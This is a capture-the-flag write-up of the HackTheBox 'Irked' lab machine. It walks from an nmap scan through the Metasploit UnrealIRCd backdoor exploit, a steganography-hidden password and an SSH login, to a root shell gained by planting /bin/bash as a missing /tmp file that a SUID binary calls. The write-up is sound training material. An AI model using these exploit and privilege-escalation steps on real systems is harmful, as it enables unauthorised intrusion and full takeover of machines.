HTB: Irked

As usual, we will start off with a nmap scan.

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
34271/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd

Looks like irc is running on a couple ports as well as httpd. Taking into account the name of the box, its probably safe to assume irc is the way in, but first lets look at the website.

Hmm, lets pull down that jpg for later.

A quick google of UnrealIRCd returns a backdoor in the 3.2.8.1 (cve-2010-2075) release and there is a Metasploit module. Lets set it up on port 8067 and see what we get.

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  10.10.10.117     yes       The target address
   RPORT  8067             yes       The target port (TCP)

Works and we get dropped into a user named ircd.

whoami
ircd

Looking through home directories, there are a couple interesting files found in another user’s Documents directory.

/home/djmardov/Documents
ls -lah
total 16K
drwxr-xr-x  2 djmardov djmardov 4.0K May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4.0K Nov 23 10:40 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt

Catting out the .backup file gives us a password and a bit of a hint.

Super elite steg backup pw
UP********************ss

Now, we have a password and a hint pointing to stego. Lets look at the jpg we downloaded earlier with steghide.

steghide extract -sf irked.jpg

This gives use another file, pass.txt.

Ka************HG

Using that password to ssh in as the user that owned the file, we now have access to user.txt and a clean shell.

cat user.txt
4a****************************8e

After a bit of enumeration, we find an executable with an interesting name.

find / -user root -perm -4000 -print 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount

Running that gives us one more hint. It looks like its calling another file.

/usr/bin/viewuser
(unknown) :0           2018-11-22 12:34 (:0)
sh: 1: /tmp/listusers: not found
This application is being devleoped to set and test user permissions
It is still being actively developed

Creating a file containing /bin/bash in that location and running it again gives us a root shell and the root flag.

echo "/bin/bash" > /tmp/listusers
chmod +x /tmp/listusers
/usr/bin/viewuser
(unknown) :0           2018-11-22 12:34 (:0)
whoami
root
cat /root/root.txt
8d****************************f3

NOTE: We do not need to use the djmardov user for this, in fact. The privesc can be done via the ircd user, then the user flag can be accessed via the root user. This is, however, probably not the intended path.

This was a pretty direct machine, however the use of stego to hide a password is a little unrealistic. A few of the new machines being added to the active lineup have been more real-world, for example DevOops, which make them a bit more fun.

 

Leave a Reply

Your email address will not be published. Required fields are marked *